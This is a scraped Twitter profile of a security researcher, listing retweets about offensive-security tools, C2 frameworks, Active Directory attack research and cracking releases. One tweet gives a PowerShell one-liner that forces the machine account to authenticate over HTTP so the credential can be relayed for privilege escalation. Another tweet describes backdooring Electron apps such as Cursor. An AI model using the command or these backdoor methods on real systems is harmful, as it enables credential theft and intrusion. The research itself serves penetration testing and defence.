Zak (@_zaksec)'s Twitter Profile
Zak

@_zaksec

Hacker with a colored hat - github.com/Z4kSec/

ID: 753811757424979969

https://z4ksec.github.io/ 15-07-2016 04:41:42

495 Tweets

1.1K Followers

621 Following

Mayfly (@m4yfly)

Did you know you didn't need to use a potatoes exploit to go from iis apppool account to admin or system ? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials To get an HTTP coerce of the machine account. 👇🧵

SpecterOps (@specterops)

Happy #BloodHoundBasics day! Tired of the old 'Enable SMB signing everywhere' rec that isn't actually practical? BloodHound can help you convert that massive IT project into a doable risk mitigation effort, focused on those systems truly vulnerable to relay attacks. 🧵: 1/2

Aurélien Chalot (@defte_)

For those interested in the browser cache smuggling attack I presented yesterday, you will find the full blogpost here sensepost.com/blog/2023/brow…. I'll update it ASAP so that it includes the entire weaponizing part as well as some clever remediations I discussed with some of you :)

Exegol (@exegogol)

We've been cooking 🧑‍🍳 Exegol images 3.1.6 are live 🔷 Container startup time is 50% faster (improved my-resources performance and logging) 🚀 🔷 Images are 10% lighter (removed buildtime cache, git shallow) 🪶 🔷 New tools, released Exegol history v2 module (beta 🪲), extended

Bobby Cooke (@0xboku)

As promised... this is Loki Command & Control! 🧙‍♂️🔮🪄 Thanks to Dylan Tran for his work done on the project and everyone else on the team for making this release happen! github.com/boku7/Loki

SpecterOps (@specterops)

New day, new #BloodHoundBasics post! DYK that BloodHound CE now supports deep linking? This week, we released early access support that goes beyond what the old back button offered! Go back (& forward), & share your current view of the graph w/ your fellow operators today! 1/2

John Hammond (@_johnhammond)

I Backdoored Cursor AI 😎 youtu.be/FYok3diZY78 Finally getting a chance to play with Loki C2, the super cool Node JS C2 framework for backdooring Electron applications (think Discord, Slack, too!) -- put together by the incredible Bobby Cooke 🔥We even got to nerd out over DMs to

PentHertz (@penthertz)

🚀 RF Swift v0.6.0 is here! 🛡️ Now with host & network isolation, it's become THE essential tool for security work. No more host reinstallation, VM or burner laptop headaches! #RFSwift 📡✨ 👉 Release: github.com/PentHertz/RF-S…

Synacktiv (@synacktiv)

The FastCGI library, mostly used in embedded equipment, was vulnerable for decades to an integer overflow over the IPC socket in 32-bits architecture. Check out how Shiro found it and exploited it for RCE! synacktiv.com/en/publication…

SpecterOps (@specterops)

Introducing the BloodHound Query Library! 📚 Martin Sohn & Joey Dreijer explore the new collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem. ghst.ly/4jTgRQQ

@Cravaterouge.bsky.social (@rouge_cravate)

New article for those curious about what they can find in the AD Recycle Bin (Bonus: I updated bloodyAD so you can play on this😉) linkedin.com/feed/update/ur…

5pider (@c5pider)

Introducing Havoc Professional: A Lethal Presence We’re excited to share a first look at Havoc Professional, a next-generation, highly modular Command and Control framework, and Kaine-kit our fully Position Independent Code agent engineered for stealth! infinitycurve.org/blog/introduct…

S3cur3Th1sSh1t (@shitsecure)

This is so much! 🔥🔥😎 Found two new Potato triggers just today. Not only Potato but can also be used for LPE as remote auth is done which could be relayed to LDAP without Signing enabled. Or relayed to ADCS for a certificate. github.com/warpnet/MS-RPC…

Dirk-jan (@_dirkjan)

It's been almost a year since my last blog... So, here is a new one: Extending AD CS attack surface to the cloud with Intune certificates. Also includes ESC1 over Intune (in some cases). dirkjanm.io/extending-ad-c… Oh, and a new tool for SCEP: github.com/dirkjanm/scepr…

SpecterOps (@specterops)

Red teamers know the drill: endless file churning, hunting for passwords & tokens. 🔍 Meet DeepPass2, our new secret scanning tool that goes beyond structured tokens to catch those tricky free-form passwords too. Read Neeraj Gupta's blog post for more. ghst.ly/40HLNNA

hashcat (@hashcat)

hashcat v7.0.0 released! After nearly 3 years of development and over 900,000 lines of code changed, this is easily the largest release we have ever had. Detailed writeup is available here: hashcat.net/forum/thread-1…
